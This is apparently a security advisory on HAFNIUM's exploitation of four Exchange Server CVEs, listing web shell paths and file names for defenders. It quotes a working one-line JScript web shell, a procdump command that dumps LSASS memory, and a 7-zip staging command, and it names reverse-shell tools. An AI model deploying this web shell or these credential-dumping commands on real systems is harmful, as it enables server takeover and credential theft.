Who is HAFNIUM?
HAFNIUM is a threat actor that historically targeted entities in the United States for the purpose of exfiltrating information from industry sectors. It has engaged in a number of attacks using previously unknown exploits targeting on-premises Exchange Server software. These attacks include three steps. First, gaining access to an Exchange Server either with stolen credentials or by using previously undiscovered vulnerabilities to disguise itself as someone who should have access. Second, it creates a web shell to control the compromised server remotely. Third, it uses remote access ran from U.S. based private servers to steal data from the organizations network. Data exfiltration is typically conducted through sharing sites like MEGA (https://mega.nz/).
HAFNIUM Common Vulnerabilities and Exposures (CVEs)
The following CVEs were utilized by HAFNIUM.:
- CVE-2021-26855 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855) is a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.
- CVE-2021-26857 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857) is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gave HAFNIUM the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.
- CVE-2021-26858 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server, then it could use this vulnerability to write a file to any path on the server. It could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.
- CVE-2021-27065 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server, then it could use this vulnerability to write a file to any path on the server. It could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.
What Happened with the CVEs?
- After exploiting these vulnerabilities to gain an initial foothold, HAFNIUM operators deploy web shells on the compromised server. An example web shell can be seen below. <%@ Page language=”Jscript”%><%System.IO.File.WriteAllText(Request.Item[“p”], Request.Item[“c”]);%>
- Following the web shell deployment, Procdump is utilized to dump LSASS process memory.
- C:\windows\temp\procdump64 -accepteula -ma lsass.exe C:\windows\temp\lsass
- Then 7-zip is utilized to compress stolen data into ZIP files for exfiltration.
- C;\ProgramData\7z a -t7z -r C:\ProgramData\it.zip C:\ProgramData\pst
HAFNIUM operators also use PowerShell snap-ins to export mailbox data. This snap in is called Microsoft.Exchange.Management.PowerShell.SnapIn.
Another PowerShell script Nishang, (https://github.com/samratashok/nishang) an offensive security toolkit, is used to create a reverse shell. Following this powercat (https://github.com/besimorhino/powercat) is used to connect to the remote server.
Web shells can be found in the following paths:
- C:\inetpub\wwwroot\aspnet_client\
- C:\inetpub\wwwroot\aspnet_client\system_web\
In Microsoft Exchange Server installation paths such as:
- %PROGRAMFILES%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\
- C:\Exchange\FrontEnd\HttpProxy\owa\auth\
The web shells have these common file names:
- web.aspx
- help.aspx
- document.aspx
- errorEE.aspx
- errorEEE.aspx
- errorEW.aspx
- errorFF.aspx
- healthcheck.aspx
- aspnet_www.aspx
- aspnet_client.aspx
- xx.aspx
- shell.aspx
- aspnet_iisstart.aspx
- one.aspx
Who is Affected?
All users of Microsoft Exchange servers currently not on the latest CU and SU patches are affected. If ignored, all Microsoft Exchange servers not patched can be completely compromised leading to data exfiltration or ransomware execution. More IOC information and hunting queries can be found on Microsoft’s HAFNIUM blog post: (https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/)